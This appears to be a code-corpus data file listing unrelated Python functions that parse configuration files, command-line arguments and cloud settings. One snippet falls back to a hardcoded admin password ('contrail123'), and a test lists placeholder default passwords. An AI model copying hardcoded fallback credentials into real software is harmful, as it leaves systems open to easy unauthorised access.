"def test_parse_config(self):\n config_file = os.path.join('top', 'conf', 'top.conf')\n\n self._c.set_config_file(config_file)\n self._c.parse_config()\n\n received = self._c.adp_loop\n expected = 30\n msg = 'AdpB2CConfig.adp_loop error'\n self.assertEqual(received, expected, msg)\n\n received = self._c.adp_dirs\n expected = ['/var/ftp/pub/nparcel/adp/in']\n msg = 'AdpB2CConfig.adp_dirs error'\n self.assertListEqual(received, expected, msg)\n\n received = self._c.archive_dir\n expected = '/data/top/archive'\n msg = 'AdpB2CConfig.archive_dir error'\n self.assertEqual(received, expected, msg)\n\n received = self._c.adp_file_formats\n expected = []\n msg = 'AdpB2CConfig.adp_file_formats error'\n self.assertListEqual(received, expected, msg)\n\n # For the default configuration file the [db] section is blank\n received = self._c.db_kwargs()\n msg = 'AdpB2CConfig.db_kwargs error'\n self.assertIsNone(received, msg)\n\n received = self._c.code_header\n expected = 'TP Code'\n msg = 'AdpB2CConfig.code_header error'\n self.assertEqual(received, expected, msg)\n\n received = self._c.adp_headers\n expected = {'agent.code': 'TP Code',\n 'agent.dp_code': 'DP Code',\n 'agent.name': 'ADP Name',\n 'agent.address': 'Address',\n 'agent.suburb': 'Suburb',\n 'agent.state': 'State',\n 'agent.postcode': 'Postcode',\n 'agent.opening_hours': 'Opening Hours',\n 'agent.notes': 'Notes',\n 'agent.parcel_size_code': 'ADP Accepts Parcel Size',\n 'agent.phone_nbr': 'Phone',\n 'agent.contact_name': 'Contact',\n 'agent.email': 'Email',\n 'agent.fax_nbr': 'Fax',\n 'agent.latitude': 'Latitude',\n 'agent.longitude': 'Longitude',\n 'agent.status': 'Active',\n 'delivery_partner.id': 'DP Id',\n 'login_account.username': 'Username'}\n msg = 'AdpB2CConfig.adp.headers error'\n self.assertDictEqual(received, expected, msg)\n\n received = self._c.delivery_partners\n expected = ['Nparcel', 'ParcelPoint', 'Toll', 'National Storage']\n msg = 'AdpB2CConfig.adp.delivery_partners error'\n self.assertListEqual(received, expected, msg)\n\n received = self._c.adp_default_passwords\n expected = {'nparcel': 'aaaa',\n 'parcelpoint': 'bbbb',\n 'toll': 'cccc',\n 'national storage': 'dddd'}\n msg = 'AdpB2CConfig.adp_default_passwords error'\n self.assertDictEqual(received, expected, msg)",
"def parse_args(self):\n defaults = {\n 'analytics_api_ip': '127.0.0.1',\n 'analytics_api_port': '8181',\n 'start_time': 'now-10m',\n 'end_time': 'now',\n 'select' : [],\n 'sort': [],\n 'admin_user': 'admin',\n 'admin_password': 'contrail123',\n 'conf_file': '/etc/contrail/contrail-keystone-auth.conf',\n 'is_service_instance': 0\n }\n\n conf_parser = argparse.ArgumentParser(add_help=False)\n conf_parser.add_argument(\"--admin-user\", help=\"Name of admin user\")\n conf_parser.add_argument(\"--admin-password\", help=\"Password of admin user\")\n conf_parser.add_argument(\"--conf-file\", help=\"Configuration file\")\n conf_parser.add_argument(\"--analytics-api-ip\", help=\"IP address of Analytics API Server\")\n conf_parser.add_argument(\"--analytics-api-port\", help=\"Port of Analytcis API Server\")\n args, remaining_argv = conf_parser.parse_known_args();\n\n configfile = defaults['conf_file']\n if args.conf_file:\n configfile = args.conf_file\n\n config = ConfigParser.SafeConfigParser()\n config.read(configfile)\n if 'KEYSTONE' in config.sections():\n if args.admin_user == None:\n args.admin_user = config.get('KEYSTONE', 'admin_user')\n if args.admin_password == None:\n args.admin_password = config.get('KEYSTONE','admin_password')\n\n if args.admin_user == None:\n args.admin_user = defaults['admin_user']\n if args.admin_password == None:\n args.admin_password = defaults['admin_password']\n\n if args.analytics_api_ip == None:\n args.analytics_api_ip = defaults['analytics_api_ip']\n if args.analytics_api_port == None:\n args.analytics_api_port = defaults['analytics_api_port']\n\n parser = argparse.ArgumentParser(\n # Inherit options from config_parser\n parents=[conf_parser],\n # print script description with -h/--help\n description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.set_defaults(**defaults)\n\n parser.add_argument(\n \"--start-time\", help=\"Logs start time (format now-10m, now-1h)\")\n parser.add_argument(\"--end-time\", help=\"Logs end time\")\n parser.add_argument(\n \"--last\", help=\"Logs from last time period (format 10m, 1d)\")\n parser.add_argument(\n \"--table\", help=\"SessionAPI to query\", required=True,\n choices=['SessionSeriesTable', 'SessionRecordTable'])\n parser.add_argument(\n \"--session-type\", help=\"Session Type\", required=True,\n choices=['client', 'server'])\n parser.add_argument(\n \"--is-service-instance\", help=\"Service Instance Sessions\", type=int)\n parser.add_argument(\n \"--select\", help=\"List of Select Terms\", nargs='+')\n parser.add_argument(\n \"--where\", help=\"List of Where Terms to be ANDed\", nargs='+')\n parser.add_argument(\n \"--filter\", help=\"List of Filter Terms to be ANDed\", nargs='+')\n parser.add_argument(\n \"--sort\", help=\"List of Sort Terms\", nargs='+')\n parser.add_argument(\n \"--limit\", help=\"Limit the number of results\")\n\n self._args = parser.parse_args(remaining_argv)\n\n self._args.admin_user = args.admin_user\n self._args.admin_password = args.admin_password\n self._args.analytics_api_ip = args.analytics_api_ip\n self._args.analytics_api_port = args.analytics_api_port\n\n try:\n self._start_time, self._end_time = \\\n OpServerUtils.parse_start_end_time(\n start_time = self._args.start_time,\n end_time = self._args.end_time,\n last = self._args.last)\n except:\n return -1\n\n return 0",
"def __parsePropertyElement(properties):\n global __all_config\n if properties and len(properties) > 0:\n for prop in properties:\n name = prop.getAttribute(\"name\")\n value = prop.getAttribute(\"value\")\n if name == \"thread-size\":\n if not re.match(r\"[0-9]{1,3}\", value):\n value = \"1\"\n __addProperty(name, value)\n elif name == \"follow\":\n if not re.match(\"true\", value, re.I) and not re.match(\"false\", value, re.I):\n value = \"false\"\n __addProperty(name, value.lower())\n elif name == \"format\":\n value = value.strip()\n __addProperty(name, value)\n elif name == \"connect-timeout\":\n if not re.match(r\"[0-9]+\", value):\n value = \"0\"\n __addProperty(name, value)\n elif name == \"read-timeout\":\n if not re.match(r\"[0-9]+\", value):\n value = \"0\"\n __addProperty(name, value)\n elif name == \"method\":\n if not re.match(\"get\", value, re.I) and not re.match(\"post\", value, re.I):\n value = \"GET\"\n __addProperty(name, value.upper())\n\n #print(__all_config)",
"def __init__(self):\n ConfigParser.RawConfigParser.OPTCRE = re.compile(r'(?P<option>[^=\\s][^=]*)\\s*(?P<vi>[=])\\s*(?P<value>.*)$')\n self.CONFIG = ConfigParser.ConfigParser()\n self.CONFIG.read(os.path.join(os.path.dirname(__file__)))\n self.IPS = []",
"def parse(self, content):\n self._sections = {}\n self._filters = []\n section = None\n\n def error(msg):\n print('autodl.cfg: line {}: {}'.format(i + 1, msg))\n # log('autodl.cfg: line {}: {}'.format(i + 1, msg))\n\n first_prog = re.compile(ur'^\\[\\s*([\\w\\-]+)\\s*(?:([^\\]]+))?\\s*]$')\n second_prog = re.compile(ur'^([\\w\\-]+)\\s*=(.*)$')\n lines = content['data'].split('\\n')\n for line in lines:\n i = 0\n line = line.strip()\n if line == '':\n continue\n\n first_array = first_prog.match(line)\n second_array = second_prog.match(line)\n if line[0] == '#':\n if section:\n section.add_comment(line)\n elif first_array:\n _type = first_array.group(1).strip().lower()\n try:\n _name = first_array.group(2).strip().lower()\n except AttributeError:\n _name = None\n section = self.get_section(_type, _name)\n elif second_array:\n if section is None:\n error('Missing a [section]')\n else:\n _option = second_array.group(1).strip().lower()\n _value = second_array.group(2).strip().lower()\n section.add_option(_option, _value)\n else:\n error('Ignoring line')\n i += 1",
"def read_config(self):\n cfg = read_conf(self.CONF_FILE)\n self.api_key = cfg[\"ALERT_API_KEY\"]\n self.title = cfg[\"APP_NAME\"]\n if type(cfg[\"alertes\"]) is dict:\n self.alertes = cfg[\"alertes\"]\n else:\n self.alertes = dict()",
"def get_data_config(self):\n conf_map = {}\n\n if self.alien_alg.currentIndex() == 1:\n conf_map['alien_alg'] = '\"block_aliens\"'\n if len(self.aliens.text()) > 0:\n conf_map['aliens'] = str(self.aliens.text()).replace('\\n', '')\n if self.alien_alg.currentIndex() == 2:\n conf_map['alien_alg'] = '\"alien_file\"'\n if len(self.alien_file.text()) > 0:\n conf_map['alien_file'] = '\"' + str(self.alien_file.text()) + '\"'\n elif self.alien_alg.currentIndex() == 3:\n conf_map['alien_alg'] = '\"AutoAlien1\"'\n if len(self.AA1_size_threshold.text()) > 0:\n conf_map['AA1_size_threshold'] = str(self.AA1_size_threshold.text())\n if len(self.AA1_asym_threshold.text()) > 0:\n conf_map['AA1_asym_threshold'] = str(self.AA1_asym_threshold.text())\n if len(self.AA1_min_pts.text()) > 0:\n conf_map['AA1_min_pts'] = str(self.AA1_min_pts.text())\n if len(self.AA1_eps.text()) > 0:\n conf_map['AA1_eps'] = str(self.AA1_eps.text())\n if len(self.AA1_amp_threshold.text()) > 0:\n conf_map['AA1_amp_threshold'] = str(self.AA1_amp_threshold.text())\n if self.AA1_save_arrs.isChecked():\n conf_map['AA1_save_arrs'] = \"True\"\n if len(self.AA1_expandcleanedsigma.text()) > 0:\n conf_map['AA1_expandcleanedsigma'] = str(self.AA1_expandcleanedsigma.text())\n\n if len(self.amp_intensity.text()) > 0:\n conf_map['amp_threshold'] = str(self.amp_intensity.text())\n if len(self.binning.text()) > 0:\n conf_map['binning'] = str(self.binning.text()).replace('\\n', '')\n if len(self.center_shift.text()) > 0:\n conf_map['center_shift'] = str(self.center_shift.text()).replace('\\n', '')\n if len(self.adjust_dimensions.text()) > 0:\n conf_map['adjust_dimensions'] = str(self.adjust_dimensions.text()).replace('\\n', '')\n\n return conf_map",
"def read_settings(self):\n config = ConfigParser.ConfigParser()\n config_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'digital_ocean.ini')\n config.read(config_path)\n\n # Credentials\n if config.has_option('digital_ocean', 'api_token'):\n self.api_token = config.get('digital_ocean', 'api_token')\n\n # Cache related\n if config.has_option('digital_ocean', 'cache_path'):\n self.cache_path = config.get('digital_ocean', 'cache_path')\n if config.has_option('digital_ocean', 'cache_max_age'):\n self.cache_max_age = config.getint('digital_ocean', 'cache_max_age')\n\n # Private IP Address\n if config.has_option('digital_ocean', 'use_private_network'):\n self.use_private_network = config.getboolean('digital_ocean', 'use_private_network')\n\n # Group variables\n if config.has_option('digital_ocean', 'group_variables'):\n self.group_variables = ast.literal_eval(config.get('digital_ocean', 'group_variables'))",
"def _extract_settings(config):\n # Some helper functions to get typed fields with good error reporting\n def get(key):\n value = getattr(config, key, None)\n if value is None:\n raise Error(\"Required 'Akara' configuration %r is missing\" % (key,))\n return value\n \n def getstring(key):\n value = get(key)\n if not isinstance(value, basestring):\n raise Error(\"'Akara' configuration %r must be a string, not %r\" %\n (key, value))\n return value\n\n def getint(key):\n value = get(key)\n try:\n return int(value)\n except ValueError:\n raise Error(\"'Akara' configuration %r must be an integer, not %r\" % \n (key, value))\n \n def getpositive(key):\n value = get(key)\n if value <= 0:\n raise Error(\n \"'Akara' configuration %r must be a positive integer, not %r\" %\n (key, value))\n return value\n\n def getnonnegative(key):\n value = getint(key)\n if value <= 0:\n raise Error(\n \"'Akara' configuration %r must be a non-negative integer, not %r\" %\n (key, value))\n return value\n\n\n settings = {}\n\n # The value for 'Listen' can be:\n # <port> as in 8080\n # -or-\n # <host>:<port> as in \"localhost:8081\"\n addr = get('Listen')\n if isinstance(addr, int):\n host, port = (\"\", addr)\n else:\n if ':' in addr:\n host, port_s = addr.rsplit(':', 1)\n else:\n host, port_s = '', addr\n try:\n port = int(port_s)\n if port <= 0:\n raise ValueError\n except ValueError:\n raise Error(\"Listen port must be a positive integer, not %r\" % port_s)\n\n settings[\"server_address\"] = (host, port)\n\n # Used to contract the full OpenSearch template to a given service.\n # If not present, use the Listen host and port.\n # (And if the host isn't present, use 'localhost'. It's not a good\n # default but I'm not going to do a FQDN lookup here since that has\n # side effects. Basically, if you need the name right, then set it.)\n try:\n server_root = getstring('ServerRoot')\n except Error:\n if port == 80:\n fmt = \"http://%(host)s/\"\n else:\n fmt = \"http://%(host)s:%(port)s/\"\n server_root = fmt % dict(host = (host or \"localhost\"), port = port)\n \n # Uses only when an Akara service wants to call another Akara service.\n # Needed for the (rare) cases when the listen server has a different\n # local name than the published server.\n try:\n internal_server_root = getstring('InternalServerRoot')\n except Error:\n internal_server_root = server_root\n \n settings[\"server_root\"] = server_root\n settings[\"internal_server_root\"] = internal_server_root\n\n config_root = getstring('ConfigRoot')\n config_root = os.path.expanduser(config_root)\n settings[\"config_root\"] = os.path.abspath(config_root)\n\n pid_file = getstring('PidFile')\n settings[\"pid_file\"] = os.path.join(config_root, pid_file)\n\n error_log = getstring('ErrorLog')\n settings[\"error_log\"] = os.path.join(config_root, error_log)\n\n access_log = getstring('AccessLog')\n settings[\"access_log\"] = os.path.join(config_root, access_log)\n\n module_dir = getstring(\"ModuleDir\")\n settings[\"module_dir\"] = os.path.join(config_root, module_dir)\n \n module_cache = getstring(\"ModuleCache\")\n settings[\"module_cache\"] = os.path.join(config_root, module_cache)\n\n log_level_orig = getstring('LogLevel')\n log_level_s = log_level_orig.upper()\n if log_level_s in _valid_log_levels:\n log_level = _valid_log_levels[log_level_s]\n else:\n raise Error(\n \"global setting 'LogLevel' is %r but must be one of: %s\" %\n (log_level_s, \", \".join(map(repr, _valid_log_levels))))\n \n settings[\"log_level\"] = log_level\n\n\n\n settings[\"max_servers\"] = getpositive(\"MaxServers\")\n settings[\"min_spare_servers\"] = getnonnegative(\"MinSpareServers\")\n settings[\"max_spare_servers\"] = getnonnegative(\"MaxSpareServers\")\n if settings[\"max_spare_servers\"] < settings[\"min_spare_servers\"]:\n raise Error(\"MaxSpareServers (%r) must be greater than MinSpareServers (%r)\" %\n (settings[\"max_spare_servers\"], settings[\"min_spare_servers\"]))\n settings[\"max_requests_per_server\"] = getpositive(\"MaxRequestsPerServer\")\n\n return settings",
"def _parse_config(self, config=None):\r\n # TODO: Load user configuration from the file\r\n # self._current_user_name = get_from_conf(\r\n # config, \"user_name\", self._current_user_name\r\n # )\r\n pass",
"def __init__(self):\n self.inventory = {}\n self.mac_map = {}\n\n for conffile in CONF.config_file:\n # parse each config file\n sections = {}\n parser = cfg.ConfigParser(conffile, sections)\n try:\n parser.parse()\n except IOError as e:\n LOG.error(str(e))\n\n # filter out sections that begin with the driver's tag\n hosts = {k: v for k, v in sections.items()\n if k.startswith(c.DRIVER_TAG)}\n\n # munge the oslo_config data removing the device tag and\n # turning lists with single item strings into strings\n for host in hosts:\n dev_id = host.partition(c.DRIVER_TAG)[2]\n dev_cfg = {k: v[0] for k, v in hosts[host].items()}\n for b in c.BOOLEANS:\n if b in dev_cfg:\n dev_cfg[b] = types.Boolean()(dev_cfg[b])\n self.inventory[dev_id] = dev_cfg\n # If mac is defined add it to the mac_map\n if 'mac' in dev_cfg:\n self.mac_map[dev_cfg['mac'].upper()] = dev_id\n\n LOG.info('Ansible Host List: %s', ', '.join(self.inventory))",
"def _parse(self, content):\n result = TincConfParser.conf_file.parseString(to_unicode(content))\n for entry in result.get(\"entries\", []):\n self[entry[0]] = entry[1]\n keys = result.get(\"keys\", [])\n if keys:\n if len(keys) > 1:\n raise ParserError(\"Hostfile specifies more than one public key!\")\n self.rsa_public_key = '\\n'.join(keys[0])\n old_keys = result.get(\"old_keys\", [])\n for old_key in old_keys:\n self.old_public_keys.append('\\n'.join(old_key))",
"def _parse_config(self):\n with open(self.config_file, 'r') as j:\n config_dict = json.loads(j.read())\n # if attribute is already defined as None in class instances dict, update it.\n for k, v in config_dict.items():\n if k in self.__dict__.keys():\n if self.__dict__[k] is None:\n setattr(self, k, v)",
"def paargs(self):\n paopt_find = {'Night':self.night, 'Telescope':self.telescope, 'Field':self.field, 'RA':self.ra,\n 'DEC':self.dec, 'TimeBeforeDiscovery': self.t_before, 'TimeAfterDiscovery': self.t_after,\n 'Program':self.program, 'datadir':self.datadir, 'outdir':self.outdir}\n paopt_coadd = {'outdir':self.outdir}\n paopt_extract = {'outdir':self.outdir}\n paopt_subimage = {'Program':self.program, 'Telescope':self.telescope, 'RA':self.ra, 'DEC':self.dec,\n 'PixelRadius':self.pixrad, 'tempdir':self.tempdir, 'outdir':self.outdir}\n paopt_imdiff = {'outdir':self.outdir}\n paopt_refstars = {'RA':self.ra, 'DEC':self.dec, 'outdir':self.outdir}\n paopt_phot = {'outdir':self.outdir, 'dumpfile':self.dump_pa('Photometry')}\n\n paopts={}\n defList={'Find_Data' : paopt_find,\n 'Coaddition' : paopt_coadd,\n 'Source_Extraction' : paopt_extract,\n 'Make_Subimages' : paopt_subimage,\n 'Image_Differencing' : paopt_imdiff,\n 'Choose_Refstars' : paopt_refstars,\n 'Photometry' : paopt_phot}\n\n def getPAConfigFromFile(PA,algs):\n def mergeDicts(source,dest):\n for k in source:\n if k not in dest:\n dest[k]=source[k]\n userconfig={}\n if PA in algs:\n fc=algs[PA]\n for k in fc: #do a deep copy leave QA config out\n if k != \"QA\":\n userconfig[k]=fc[k]\n defconfig={}\n if PA in defList:\n defconfig=defList[PA]\n mergeDicts(defconfig,userconfig)\n return userconfig\n\n for PA in self.palist:\n paopts[PA]=getPAConfigFromFile(PA,self.algorithms)\n\n\n return paopts",
"def __init__(__self__, *,\n extended_location: pulumi.Input['ExtendedLocationArgs'],\n l3_isolation_domain_id: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n vlan: pulumi.Input[float],\n hybrid_aks_ipam_enabled: Optional[pulumi.Input[Union[str, 'HybridAksIpamEnabled']]] = None,\n hybrid_aks_plugin_type: Optional[pulumi.Input[Union[str, 'HybridAksPluginType']]] = None,\n interface_name: Optional[pulumi.Input[str]] = None,\n ip_allocation_type: Optional[pulumi.Input[Union[str, 'IpAllocationType']]] = None,\n ipv4_connected_prefix: Optional[pulumi.Input[str]] = None,\n ipv6_connected_prefix: Optional[pulumi.Input[str]] = None,\n l3_network_name: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"extended_location\", extended_location)\n pulumi.set(__self__, \"l3_isolation_domain_id\", l3_isolation_domain_id)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n pulumi.set(__self__, \"vlan\", vlan)\n if hybrid_aks_ipam_enabled is None:\n hybrid_aks_ipam_enabled = 'True'\n if hybrid_aks_ipam_enabled is not None:\n pulumi.set(__self__, \"hybrid_aks_ipam_enabled\", hybrid_aks_ipam_enabled)\n if hybrid_aks_plugin_type is None:\n hybrid_aks_plugin_type = 'SRIOV'\n if hybrid_aks_plugin_type is not None:\n pulumi.set(__self__, \"hybrid_aks_plugin_type\", hybrid_aks_plugin_type)\n if interface_name is not None:\n pulumi.set(__self__, \"interface_name\", interface_name)\n if ip_allocation_type is None:\n ip_allocation_type = 'DualStack'\n if ip_allocation_type is not None:\n pulumi.set(__self__, \"ip_allocation_type\", ip_allocation_type)\n if ipv4_connected_prefix is not None:\n pulumi.set(__self__, \"ipv4_connected_prefix\", ipv4_connected_prefix)\n if ipv6_connected_prefix is not None:\n pulumi.set(__self__, \"ipv6_connected_prefix\", ipv6_connected_prefix)\n if l3_network_name is not None:\n pulumi.set(__self__, \"l3_network_name\", l3_network_name)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)",
"def getACSParams(self):\n params = {}\n params[\"dnsNamePrefix\"] = self.value(self.get('ACS', 'dnsPrefix'))\n params[\"orchestratorType\"] = self.value(self.get('ACS', 'orchestratorType'))\n params[\"agentCount\"] = self.value(self.getint('ACS', 'agentCount'))\n params[\"agentVMSize\"] = self.value(self.get('ACS', 'agentVMSize'))\n params[\"masterCount\"] = self.value(self.getint('ACS', 'masterCount'))\n params[\"linuxAdminUsername\"] = self.value(self.get('ACS', 'username'))\n params[\"sshRSAPublicKey\"] = self.value(self.get('SSH', 'publickey'))\n \n return params",
"def parse_main(self):\n try:\n self.common_config[\"debug\"] = self.config.get('main', 'debug')\n except ConfigParser.NoOptionError:\n self.common_config[\"debug\"] = \"FALSE\"\n \n try:\n conf_local_ip = self.config.get('main', 'local_ip')\n if is_valid_ipv4_address(conf_local_ip):\n self.common_config[\"local_ip\"] = conf_local_ip\n \n elif conf_local_ip == \"default\": #if loca_if == \"default\" try to reach google.com\n try:\n self.common_config[\"local_ip\"] = get_ip_address()\n except Exception, e:\n self.logger.configError(\"cannot discover local ip address: %s\" % e)\n sys.exit(1)\n\n else: #network interface name\n try:\n self.common_config[\"local_ip\"] = get_ip_address_ifname(conf_local_ip)\n except Exception, e:\n self.logger.configError(\"cannot determine ip address of %s interface: %s\" % (conf_local_ip, e))\n sys.exit(1)\n\n except ConfigParser.NoOptionError: \n self.logger.configError(\"Missing mandatory parameters in config file, bailing out!\")\n sys.exit(1)\n\n try:\n log_file = self.common_config[\"log_file\"] = self.config.get('main', 'log_file') \n if log_file.startswith(\"syslog\"):\n try:\n syslog_host = log_file.split(\":\")[1]\n except IndexError:\n syslog_host = 'localhost'\n try:\n syslog_port = int(log_file.split(\":\")[2])\n except IndexError:\n syslog_port = 514\n try:\n syslog_facility = log_file.split(\":\")[3]\n except IndexError:\n syslog_facility = logging.handlers.SysLogHandler.LOG_USER\n self.logger.debugMessage(\"Logging to syslog (host: %s, port: %s, facility: %s)\" % ((syslog_host, syslog_port, syslog_facility)))\n self.common_config[\"conf_log_handler\"] = logging.handlers.SysLogHandler((syslog_host, syslog_port), syslog_facility)\n else:\n self.logger.debugMessage(\"Logging to file: %s\" % log_file)\n try:\n self.common_config[\"conf_log_handler\"] = logging.FileHandler(log_file)\n except IOError, e:\n self.logger.configError(\"cannot access to the log file: %s\" % e)\n sys.exit(1)\n \n except ConfigParser.NoOptionError: \n # no log defined in config file\n self.common_config[\"conf_log_handler\"] = None\n \n try:\n self.common_config[\"daemon\"] = self.config.get('main', 'daemon')\n except ConfigParser.NoOptionError:\n self.common_config[\"daemon\"] = None\n try:\n self.common_config[\"pid_file\"] = self.config.get('main', 'pid_file')\n except ConfigParser.NoOptionError:\n self.common_config[\"pid_file\"] = None\n\n \n return self.common_config",
"def __initConfiguration(self):\n conf = configparser.ConfigParser()\n with open(self.configFile, \"r\") as f:\n conf.readfp(f)\n self.orgConf = conf\n # check additionalSection\n adSection = self.additionalSection\n if adSection in conf:\n adSection = conf[adSection]\n self.conf = {}\n for i in [self.CLIENT_ID, self.CLIENT_SECRET, self.AUTHZ_ENDPOINT,\n self.TOKEN_ENDPOINT, self.REDIRECT_URI, self.SCOPE]:\n if adSection != None and i in adSection:\n self.conf[i] = adSection[i]\n else:\n self.conf[i] = conf[\"DEFAULT\"][i]",
"def getParams(self):\n self.logger.info(\"Getting All Params from config file.\")\n self.params = {}\n for interface in self.config.get('agent', 'interfaces'):\n params = self.params.setdefault(interface, {})\n for item in [['intf_reserve', 1000], ['intf_max', 10000], ['l3enabled', True]]:\n if self.config.has_option(interface, item[0]):\n params[item[0]] = self.config.get(interface, item[0])\n else:\n params[item[0]] = item[1]\n # Take out reserved from intf_max\n self.params[interface]['intf_max'] -= self.params[interface]['intf_reserve']",
"def read_properties(self, inputfile):\n raise NotImplementedError(\n \"Reading from this file format is not yet implemented\")",
"def parse_inifile(self):\n parsed_info = {\n \"identity_type\": None,\n \"username\": None,\n \"api_key\": None,\n \"region\": None,\n }\n res = self.configparse.read(self.inifile)\n for field in parsed_info.keys():\n try:\n parsed_info[field] = self.configparse[\"rackspace_cloud\"][field]\n except KeyError:\n parsed_info[field] = None\n pass\n return LoginInfo(\n identity_type=parsed_info[\"identity_type\"],\n username=parsed_info[\"username\"],\n api_key=parsed_info[\"api_key\"],\n region=parsed_info[\"region\"],\n )",
"def __init__(self, config):\n self.config = self.default_config()\n for key in config:\n if config[key].endswith('*'):\n config[key] = config[key][:-1]\n self.config[key] = re.split('\\s*->\\s*', config[key])",
"def parse_attributes(self):\n attrs = {}\n error = False\n for header, attr in self.app.config['SSO_ATTRIBUTE_MAP'].items():\n required, name = attr\n value = request.environ.get(header, None)\n\n attrs[name] = value\n if not value or value == '':\n if required:\n error = True\n return attrs, error",
"def _configure():\n from AthenaCommon import CfgMgr\n from AthenaCommon.AppMgr import theApp\n from AthenaCommon.AppMgr import ServiceMgr as svcMgr\n from AthenaCommon.Logging import logging\n from AthenaCommon.AthenaCommonFlags import athenaCommonFlags\n from AthenaCommon.Constants import ERROR\n\n\n msg = logging.getLogger( 'ReadAthenaxAODHybrid' )\n msg.debug(\"Configuring Athena for reading xAOD files (via TEvent, with POOL for Metadata)...\")\n\n \n #check if we already have a selector set up\n if hasattr(svcMgr, 'EventSelector'):\n err = \"svcMgr already configured with another EventSelector: [%s]\"%\\\n svcMgr.EventSelector.getFullJobOptName()\n msg.error( err )\n raise RuntimeError( err )\n\n \n \n #Setup our EventSelector\n svcMgr += CfgMgr.Athena__xAODEventSelector( \"EventSelector\" )\n \n #for historical reasons, we now add configurables of a bunch of services\n if not hasattr(svcMgr, 'THistSvc'): svcMgr += CfgMgr.THistSvc()\n if not hasattr (svcMgr, 'ProxyProviderSvc'): svcMgr += CfgMgr.ProxyProviderSvc()\n if not hasattr (svcMgr, 'InputMetaDataStore'): svcMgr += CfgMgr.StoreGateSvc(\"InputMetaDataStore\")\n if not hasattr (svcMgr, 'Athena::xAODCnvSvc'): svcMgr += CfgMgr.Athena__xAODCnvSvc()\n if not hasattr(svcMgr, 'EventPersistencySvc'): svcMgr += CfgMgr.EvtPersistencySvc( \"EventPersistencySvc\" )\n if not hasattr (svcMgr, 'MetaDataSvc'): svcMgr += CfgMgr.MetaDataSvc (\"MetaDataSvc\")\n if not hasattr(svcMgr, 'PoolSvc'): svcMgr += CfgMgr.PoolSvc()\n\n #Here we set various properties of things \n theApp.ExtSvc += [ svcMgr.EventSelector.getFullName() ]\n theApp.EvtSel = \"EventSelector\"\n svcMgr.MetaDataSvc.MetaDataContainer = \"MetaDataHdr\" #this really should be the default for this property :-(\n svcMgr.PoolSvc.OutputLevel = ERROR\n svcMgr.EventSelector.ReadMetaDataWithPool=True\n #default the input collections to the FilesInput from AthenaCommonFlags\n #this is so that the eventselector picks up input files in grid jobs\n svcMgr.EventSelector.InputCollections = athenaCommonFlags.FilesInput() \n \n\n # suppress the event loop heartbeat as it is somewhat I/O hungry for\n # no real gain in n-tuple reading/writing scenarii\n if not hasattr(svcMgr, theApp.EventLoop): svcMgr += getattr(CfgMgr, theApp.EventLoop)()\n evtloop = getattr(svcMgr, theApp.EventLoop)\n try:\n evtloop.EventPrintoutInterval = 10000\n except Exception as err:\n msg.info('disabling event loop heartbeat... [failed]')\n msg.info('performances might be sub-par... sorry.')\n pass\n\n\n msg.debug(\"Configuring Athena for reading ROOT files (via TEvent, with POOL for Metadata)... [OK]\")\n return",
"def setup_parser(self) -> Dict[str, Any]:\n\n\n # % GALAT - SPP Single Point Positioning\n # % -------------------------------------\n # % Processing Option\n # % ------------------\n # % GNSS system(s) : GALILEO\n # % Orbit type : Broadcast - INAV\n # % Solution type : SPP\n # % Frequency : E1\n # % Elevation mask : 5.0 deg\n # % Time interval : 30.0 s\n # % Ionosphere opt : NeQuick-G\n # % Troposhere opt : GMF with GPT\n # % Obs start : 2020/01/04 00:00:00.0 GPST (week 2086 518400.0s)\n # % Obs end : 2020/01/04 23:59:30.0 GPST (week 2086 604770.0s)\n # % Epoch expected : 2880\n # % Epoch have : 2880\n # %\n # % Input file(s) : KOUG00GUF_R_20200040000_01D_30S_MO.rnx\n # % Input file(s) : CNES0030.20L\n # % Input file(s) : CNES0040.20L\n # % Input file(s) : igs14.atx\n # %\n # % RINEX header info\n # % ------------------\n # % Marker : KOUG 97301M402\n # % Receiver T/V/# : SEPT POLARX5TR 5.3.0 17323022503\n # % Antenna T/ /# : LEIAR25.R3 LEIT 10180007\n # % Position XYZ : 3855263.3407 -5049731.9986 563040.4252\n # % Antenna H/E/N : 0.0000 0.0000 0.0000\n self._parse_header()\n\n # ----+----1----+----2----+----3----+----4----+----5----+----6----+----7----+----8----+----9----+----0----+--\n # 2020/01/04 00:00:00 5.098466365 -52.639742999 106.8901 -0.603 -0.821 -0.349 1.018 0.349 \n # 2020/01/04 00:00:30 5.098466094 -52.639742684 107.4962 -0.633 -0.856 0.257 1.065 0.257 \n # 2020/01/04 00:01:00 5.098466030 -52.639740961 107.6125 -0.640 -1.047 0.373 1.228 0.373 \n return dict(\n names=(\n \"yyyymmdd\", \n \"hhmmss\", \n \"latitude\", \n \"longitude\", \n \"height\", \n \"dlatitude\", \n \"dlongitude\", \n \"dheight\",\n \"hpe\",\n \"vpe\",\n \"site_vel_3d\",\n \"pdop\",\n \"num_satellite_available\",\n \"num_satellite_used\",\n ),\n comments=\"%\",\n delimiter=(10, 9, 15, 15, 10, 9, 9, 9, 9, 9, 9, 6, 4, 4),\n dtype=(\"U10\", \"U9\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\"),\n autostrip=True,\n )",
